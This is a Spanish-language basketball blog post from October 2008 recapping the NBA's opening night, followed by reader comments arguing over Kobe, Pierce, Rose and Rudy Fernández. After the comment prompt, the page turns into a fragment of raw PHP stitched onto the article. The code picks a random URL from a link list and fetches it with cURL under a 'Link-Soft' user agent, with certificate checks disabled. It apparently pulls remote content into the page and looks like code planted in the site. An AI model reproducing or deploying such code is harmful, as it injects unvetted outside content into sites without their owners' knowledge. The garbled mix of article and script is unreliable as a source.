La crónica (Opening Night Special Edition)

29 de October de 2008 por MagicJohnson32

Ya está. Ya ha empezado. La razón de nuestros desvelos, la causante de nuestras ojeras, la temporada NBA, ya es una realidad. El menú para la primera noche de la campaña 2008-2009 presentaba un primer plato de altura, un segundo de lo más interesante, y un postre de verdadero lujo. Veamos en primer lugar un resumen en imágenes de lo más destacado:

Los Celtics celebraron a lo grande su Anillo de Campeones superando a los Cavaliers en un partido intenso en el que destacaron Pierce y Rondo. Aquí tenéis el vídeo de la ceremonia de entrega de los Anillos de Campeones:

Por cierto… ¿Quién se encargaba de avisar a James Posey?

En Chicago, uno de los puntos de atención era el debut de Derrick Rose. El rookie no estuvo extraordinario pero sí dejó algunos detalles de su calida en la victoria sobre los Bucks (95-108):

Y la noche inaugural finalizó con Blazers y Lakers, o el esperado duelo entre Oden y Bynum. Lo cierto es que ambos decepcionaron, el rookie además se lesionó, y el partido lo decidieron los de siempre.

ppierceringLa crónica

El nuevo curso comenzó anoche con la impresionante estampa de Paul Pierce llorando emocionado ante la izada a la bóveda del Garden del estandarte que representa el nuevo título obtenido la pasada campaña. Inmediatamente después se vistió el mono de trabajo y, como si nada hubiera pasado desde abril, volvió a partirse la cara contra LeBron y sus Cavs hasta sacar adelante este difícil primer partido.

Al otro lado del país, los subcampeones dieron buena cuenta de los TrailBlazers con una buena actuación general de todo el equipo (incluyendo a Radmanovic) liderados por Kobe & Pau, que además se aprovecharon de una inoportuna lesión que amargó el impetuoso debut de Oden. Nada grave, parece, un esguince de grado medio. Por parte de Portland, en positivo grandísimo debut de Rudy, y en negativo, además de lo de Oden, el drosejuego del gato y el ratón de McMillan con Batum y Sergio, que han pasado de públicamente titular y segundo base respectivamente al ostracismo como el que no quiere la cosa. Peculiaridades de los técnicos.

En Chicago, Rose marcó en su debut sus credenciales a ROY con una excelente dirección de las que hacen equipo, con hasta cinco compañeros en dobles figuras y todo el mundo mojando. De poco sirvió el partidazo de Redd por parte de Milwaukee.

Premios

MVP: Kobe Bryant firmó la actuación más completa de la noche en la contundente victoria de los Lakers sobre los Blazers. Empezó el partido distribuyendo, no realizó el primer lanzamiento hasta el minuto 6, fue el máximo reboteador del partido y, cuando Portland apretó en el tercer cuarto y amenazó la victoria local, mató el partido con 9 puntos consecutivos en una actuación digna del MVP de la pasada temporada.

rudybombEl rookie: Pese a que Derrick Rose, como ya hemos destacado, dirigió la victoria de los Bulls contra los Bucks, la mejor actuación individual de un debutante corrió a cargo de Rudy Fernández, el mejor de su equipo en el Staples Center. El mallorquín anotó 16 puntos con un 50% en tiros de campo y 3 triples, además de 4 asistencias, 2 rebotes y 2 recuperaciones.

La decepción: Nos decepcionó mucho el tan anunciado cara a cara entre Bynum y Oden, pero también nos defraudaron profundamente Roy y Aldridge, dos de nuestros favoritos pero que no dieron la cara ante los Lakers.

La sorpresa: Teníamos esperanzas en que Tyrus Thomas mejorase este año sus prestaciones, pero en el primer partido lo ha hecho por encima de lo esperado. Logró 15 puntos, 10 rebotes, 3 asistencias, 2 robos y 1 tapón en 41 minutos. Hay jugador.

El mayor esfuerzo en vano: Los 30 puntos de Redd, con 10 de 19 en tiros de campo, 4 de 8 en triples, merecen ser mencionados, así que incorporamos este apartado a nuestro premios diarios.

Comenta

10 comentarios a esta entrada

  1. Vicente_Pisha dice:
    #1

    Vaya pase de Odom a Vujacic!!!!!! El nuevo Magic!!!!!!! XD

    Enhorabuena por el blog. Me gusta mucho 😉

      Citar

  2. telekoman dice:
    #2

    Señores, Rudy está aquí para quedarse. Veremos como afronta una temporada tan larga, pero de entrada no lo podía haber hecho mejor.
    Respecto a lo visto hoy, nada nuevo bajo el Sol. Kobe haciendo lo que mejor sabe, aportar y hacer que los demás aporten. Gasol imparable en las primeras mitades y sosteniendo al equipo hasta que Kobe entra en acción. Portland apuntando cositas buenas y malas (lo de las lesiones de Oden es para hacerselo mirar, me temo). McMillan volviendo a jugar con Sergio y ahora también con Batum (aunque lo cierto es que por lo que dicen, el Chacho no estuvo acertado en los 5 minutillos que tuvo). Cleveland sigue siendo sólo LeBron. Los Celtics siguen igual que al finalizar la temporada pasada. En Chicago se ven cosas interesantes, mientras que Milwaukee sigue siendo una banda pese (o gracias a , vete a saber) a los 30 puntos de Redd.

    Veremos mañana con el resto de los partidos. Esperemos que Marc empiece con buen pié y Calderón también.

    Qué ganas tenía de que esto empezara ya….

      Citar

  3. TheDeerHunter dice:
    #3

    Pero macho!!! ¿el vídeo íntegro de la ceremonia de Boston??? madre de diossss

    Al César lo que es del César… para MVP en mi opinión, como mínimo, sería obligatorio nombrar también a Paul Pierce (27ptos, 3rebs, 4asis, 1 rob) que, por dificultad y circunstancias, para mí se lo ha llevado él esta noche (sin quitarle ni un ápice de mérito a lo del animal de Kobe)

    Con respecto al rookie. Fantástico lo de Rudy… pero me da que la actuación de Rose, sin ser algo exagerado, ha sido decisiva para la VICTORIA de su equipo. Mi voto es para él.

    ¿Decepciones?? Si bueno… Portland en general ha sido la gran decepción. Pero me parece un poco exagerado destacar en ese sentido a Roy y Aldridge (cuando, por poner un ejemplo, Garnett y Allen no han hecho un partido significativamente superior)
    Mi decepción particular ha sido lo que le ha pasado a Sergio. Un día después de la renovación. Puede parecer mentira, pero no me lo esperaba. Si me dijeras que Bayless se ha salido pues bien…
    Y lo de Batum es de traca… me hubiera gustado verle la cara tras enterarse de la bromita de McMillan. Está muy bien tratar de despistar al contrario, pero supongo que a Batum no le habrá hecho ninguna gracia que le utilicen a él para eso.

    Y la sorpresa… para mí Radmanovic. Partido serio… que siga así.

      Citar

  4. MagicJohnson32 dice:
    #4

    El problema es que a Pierce ni se le vio en el último cuarto. 0 puntos, 0 de 2 en tiros, missing total. Por presencia y también por estadísticas, creo que el partido de Bryant fue más completo.

    Sobre Roy y Aldridge… es que jugaron muy mal, en serio, peor de lo que dicen sus números. La primera mitad de Aldridge fue floja, pero Roy estuvo sencillamente horroroso. Arregló su estadística en los minutos de la basura pero fue el peor partido que le he visto. Y los pongo a ellos porque son los líderes del equipo y no ejercieron como tales, y porque se llevaron una paliza en el primer partido de una temporada en la que todos esperamos grandes cosas de ellos. Garnett y Allen, mal, sí, pero ganaron a un gran equipo y son jugadores que aportan muy buena defensa.

    Y Rudy se lo ganó. Estuvo excelente en un equipo que anduvo perdido durante casi todo el tiempo. Sólo Outlaw hacía cosas bien, y Rudy apenas hizo nada mal (bueno, un airball ya hacia el final, jeje). Además, no vi a Rose, vaya.

      Citar

  5. Elio dice:
    #5

    Esperaba más combatividad por parte de Portland pero los Lakers no tuvieron rival en toda la noche, los Blazers estuvieron desaparecidos salvo el hipermotivado Rudy (alguien duda que entrará en el quinteto ideal de rookies?).

    Rose pinta bien, me alegro por Chicago y espero que vuelvan a ser un equipo competitivo como hace dos temporadas.

      Citar

  6. Viva_Dirk dice:
    #6

    En mi opinión Kobe estuvo peor que Pierce, y como me he tragado los 2 partidos esto va a misa, jeje. Ahora en serio, cuando Boston lo necesitó Pierce apareció y aunque estuvo algo pendiente de hacer capulladas con el público estuvo muy bien. Kobe para mi gusto estuvo chupón cuando no hacía falta, el equipo ganaba de 15 y los Blazers se pusieron a 8 después de que el se jugase 3 castañas, después de eso anotó para volver a poner el equipo a 15, pero dio la sensación de que no estaba a gusto teniendo tan poco protagonismo.

    Del Boston-Cavs, se vio poco rodados a ambos equipos, a los Celtics con mucho espíritu y lucha, mientras que los Cavs tienen pinta de convertirse en un equipo muy muy rocoso, y con posibilidades de no utilizar el Lebronsistema siempre, ya que Mo Williams es un salto grande de calidad.

    Tampoco se pueden sacar mas conclusiones de un solo partido.

      Citar

  7. MagicJohnson32 dice:
    #7

    Ya, y con los Cavs a 2, 3 ó 4 puntos en el último cuarto los Celtics no necesitaron a Pierce.

    Y Kobe estuvo mal en las últimas acciones de la primera mitad, con los Lakers +22. En el arranque de la segunda mitad, falla un tiro Bynum, Fisher falla tres bandejas (tres castañas, vamos) y Kobe un tiro, y los Blazers se ponen a 8. Y entonces Kobe despega. Pero en esos momento no estaba chupón. Hizo lo que mejor sabe hacer, que es matar las opciones del otro equipo.

      Citar

  8. Viva_Dirk dice:
    #8

    Pues no, la verdad es que no lo necesitaron, entre alguna cagada defensiva de los Cavs y las faltas para llevar a los tiros libres se fue el partido cuando estaba apretado.

    Tengo el partido grabado y no se si fue como dices, pero si Kobe también estuvo chupón al final del 2º cuarto, cuando se pasó de +22 a +15. No entendí el momento de Kobesistema que hubo ahí.

    Y una cosa que se me olvidaba, segun lo visto ayer(aunque se intuía antes) me temo que McMillan va a jugarse los minutos de la verdad con Roy como base, cosa que en mi opinión limita bastante al equipo.

      Citar

  9. landrusski dice:
    #9

    Pues yo vi los 2 partiditos(cavs-celtics y portland-lakers) y sobre el primero me gustaron bastante los cavs,con un gran “mo williams “,que sabe anotar cuando hace falta y en momentos clave…varejao fue el hombre que dio esperanzas al equipo hasta el final del partido con grandes rebotes ofensivos y pegandose con todos…pero los celtics con pierece son mucho celtics jeje…sobre el segundo,pues creo que coincido con todos,porque me esperaba mucho mas de portland(roy jugo el partido????)…increible rudy que creo que estara entre los 3 mejores rookies de la temporada.Luego sergio pocos minutos pero quizas tenia que haber salido mas motivado y con ganas de demostrar,cosa que no hizo…pero aun asi steve blake no puede ser base titular en ningun equipo nba,pero en fin…luego oden y bynum no me gustaron y gasoy kobe en su linea de crack….

      Citar

  10. Viva_Dirk dice:
    #10

    Ah, contesto a una pregunta de Elio: yo si creo que Rudy no entrará en el quinteto ideal de rookies, me temo que Rose-Mayo-Beasley-Love-Oden es mucho mas comercial para la liga y a parte lo merecerán, claro.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>